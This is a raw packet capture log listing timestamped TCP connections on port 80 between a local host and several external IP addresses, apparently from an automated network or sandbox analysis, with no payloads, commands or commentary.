Aug 6, 2024 07:58:47.564759016 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.564765930 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.564774036 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.566808939 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.645977974 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646008015 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646013975 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646024942 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646356106 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646549940 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646555901 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646569014 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646574974 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.646590948 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.647459030 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.647551060 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.647557974 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.647569895 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.647671938 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.648428917 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.648437023 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.648437023 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.648451090 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.648458004 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.648468971 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.649441004 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.649447918 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.649456978 CEST	80	49739	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:47.649473906 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.649473906 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:47.651500940 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:48.491827011 CEST	49739	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:49.513492107 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:49.518317938 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:49.525480986 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:49.533518076 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:49.538405895 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116708040 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116722107 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116733074 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116791010 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.116822958 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116843939 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116849899 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116858959 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.116883039 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116899967 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.116903067 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116915941 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116931915 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.116946936 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.116980076 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.121917009 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.121958017 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.121994019 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.122437000 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.122450113 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.122481108 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.205368996 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205394030 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205409050 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205419064 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205434084 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205456018 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.205485106 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.205693960 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205713034 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205739021 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205739975 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.205755949 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205768108 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.205777884 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.205806017 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.206556082 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.206567049 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.206578970 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.206598997 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.206643105 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.206657887 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.206679106 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.207447052 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.207453012 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.207458019 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.207514048 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.207525969 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.207530022 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.207571983 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:50.208302021 CEST	80	49740	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:50.208359003 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:51.038891077 CEST	49740	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.060013056 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.064975023 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.065051079 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.079626083 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.084739923 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.084773064 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642779112 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642843008 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642858982 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642873049 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642885923 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642916918 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642930031 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.642942905 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.643004894 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.643019915 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.643170118 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.643358946 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.643395901 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.649327040 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.649347067 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.649360895 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.649432898 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.729074955 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729090929 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729104042 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729110003 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729118109 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729264021 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729319096 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729326010 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729377031 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729383945 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.729413033 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.729413033 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.729413986 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.730107069 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730129957 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730140924 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730194092 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730207920 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730242014 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.730967999 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730976105 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.730998993 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.731005907 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.731019020 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.731111050 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.731775045 CEST	80	49741	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:52.731838942 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:52.737499952 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:53.585637093 CEST	49741	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:54.603970051 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:54.609035015 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:54.609148026 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:54.614984035 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:54.619853973 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193835020 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193856001 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193867922 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193873882 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193880081 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193886042 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193891048 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193897963 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.193979979 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.194010973 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.194047928 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.194047928 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.195142984 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.198955059 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.198966026 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.198980093 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.198983908 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.199213028 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.281774044 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.281794071 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.281800985 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.281805992 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.281814098 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.281888008 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.282080889 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282093048 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282099962 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282133102 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282139063 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282263041 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.282263041 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.282263041 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.282932043 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282941103 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.282948017 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283066988 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.283420086 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283428907 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283451080 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283457041 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283471107 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.283494949 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.283574104 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.284213066 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.285016060 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:58:55.285166025 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.288360119 CEST	49742	80	192.168.2.7	203.161.46.201
Aug 6, 2024 07:58:55.293324947 CEST	80	49742	203.161.46.201	192.168.2.7
Aug 6, 2024 07:59:00.753489017 CEST	49743	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:00.758368015 CEST	80	49743	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:00.769587040 CEST	49743	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:00.777484894 CEST	49743	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:00.782237053 CEST	80	49743	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:01.395257950 CEST	80	49743	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:01.396327019 CEST	80	49743	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:01.399765015 CEST	49743	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:02.288748980 CEST	49743	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:03.309503078 CEST	49744	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:03.314450026 CEST	80	49744	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:03.317712069 CEST	49744	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:03.329507113 CEST	49744	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:03.335766077 CEST	80	49744	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:03.948026896 CEST	80	49744	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:03.948081017 CEST	80	49744	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:03.948129892 CEST	49744	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:04.837496042 CEST	49744	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:05.854582071 CEST	49745	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:05.860287905 CEST	80	49745	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:05.860359907 CEST	49745	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:05.879332066 CEST	49745	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:05.884200096 CEST	80	49745	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:05.884351015 CEST	80	49745	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:06.503858089 CEST	80	49745	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:06.504057884 CEST	80	49745	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:06.504244089 CEST	49745	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:07.383517981 CEST	49745	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:08.401256084 CEST	49746	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:08.406267881 CEST	80	49746	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:08.406364918 CEST	49746	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:08.413934946 CEST	49746	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:08.418822050 CEST	80	49746	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:09.039009094 CEST	80	49746	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:09.039032936 CEST	80	49746	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:09.041698933 CEST	49746	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:09.045500040 CEST	49746	80	192.168.2.7	45.76.85.183
Aug 6, 2024 07:59:09.050333977 CEST	80	49746	45.76.85.183	192.168.2.7
Aug 6, 2024 07:59:23.253520966 CEST	49747	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:23.258452892 CEST	80	49747	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:23.259093046 CEST	49747	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:23.270353079 CEST	49747	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:23.275208950 CEST	80	49747	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:24.118792057 CEST	80	49747	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:24.118823051 CEST	80	49747	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:24.118869066 CEST	49747	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:24.773305893 CEST	49747	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:25.792695999 CEST	49748	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:25.797837973 CEST	80	49748	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:25.797954082 CEST	49748	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:25.810472012 CEST	49748	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:25.815623999 CEST	80	49748	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:26.650542974 CEST	80	49748	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:26.650774956 CEST	80	49748	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:26.650839090 CEST	49748	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:27.321530104 CEST	49748	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:28.339411020 CEST	49749	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:28.344381094 CEST	80	49749	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:28.344470024 CEST	49749	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:28.356131077 CEST	49749	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:28.360995054 CEST	80	49749	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:28.361156940 CEST	80	49749	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:29.214601994 CEST	80	49749	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:29.214762926 CEST	80	49749	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:29.214920044 CEST	49749	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:29.867156029 CEST	49749	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:30.887062073 CEST	49750	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:30.892029047 CEST	80	49750	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:30.893909931 CEST	49750	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:30.901339054 CEST	49750	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:30.906160116 CEST	80	49750	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:31.755877972 CEST	80	49750	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:31.755892992 CEST	80	49750	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:31.757827997 CEST	49750	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:31.761537075 CEST	49750	80	192.168.2.7	198.54.126.42
Aug 6, 2024 07:59:31.766372919 CEST	80	49750	198.54.126.42	192.168.2.7
Aug 6, 2024 07:59:36.792684078 CEST	49751	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:36.797512054 CEST	80	49751	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:36.797597885 CEST	49751	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:36.809534073 CEST	49751	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:36.814867020 CEST	80	49751	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:37.399935007 CEST	80	49751	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:37.400007963 CEST	80	49751	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:37.400182962 CEST	49751	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:38.320161104 CEST	49751	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:39.338814020 CEST	49752	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:39.343765974 CEST	80	49752	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:39.343875885 CEST	49752	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:39.355711937 CEST	49752	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:39.360680103 CEST	80	49752	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:39.942176104 CEST	80	49752	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:39.942217112 CEST	80	49752	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:39.942292929 CEST	49752	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:40.867538929 CEST	49752	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:41.886749983 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:41.891720057 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:41.891789913 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:41.905441046 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:41.910490036 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:41.910516024 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:43.074539900 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:43.074553013 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:43.074562073 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:43.074645996 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:43.074696064 CEST	80	49753	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:43.075654984 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:43.413891077 CEST	49753	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:44.433608055 CEST	49754	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:44.438719034 CEST	80	49754	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:44.438798904 CEST	49754	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:44.447570086 CEST	49754	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:44.452466011 CEST	80	49754	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:45.031404018 CEST	80	49754	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:45.032145023 CEST	80	49754	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:45.033668041 CEST	49754	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:45.036446095 CEST	49754	80	192.168.2.7	68.183.37.14
Aug 6, 2024 07:59:45.041332960 CEST	80	49754	68.183.37.14	192.168.2.7
Aug 6, 2024 07:59:50.304498911 CEST	49755	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:50.311914921 CEST	80	49755	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:50.311984062 CEST	49755	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:50.327028036 CEST	49755	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:50.332722902 CEST	80	49755	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:50.991974115 CEST	80	49755	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:50.992124081 CEST	80	49755	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:50.994731903 CEST	49755	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:51.836184978 CEST	49755	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:52.855717897 CEST	49756	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:52.860721111 CEST	80	49756	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:52.864300013 CEST	49756	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:52.881577015 CEST	49756	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:52.886611938 CEST	80	49756	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:53.508454084 CEST	80	49756	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:53.509088039 CEST	80	49756	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:53.509351969 CEST	49756	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:54.382666111 CEST	49756	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:55.403608084 CEST	49757	80	192.168.2.7	178.63.50.103
Aug 6, 2024 07:59:55.409013987 CEST	80	49757	178.63.50.103	192.168.2.7
Aug 6, 2024 07:59:55.409259081 CEST	49757	80	192.168.2.7	178.63.50.103
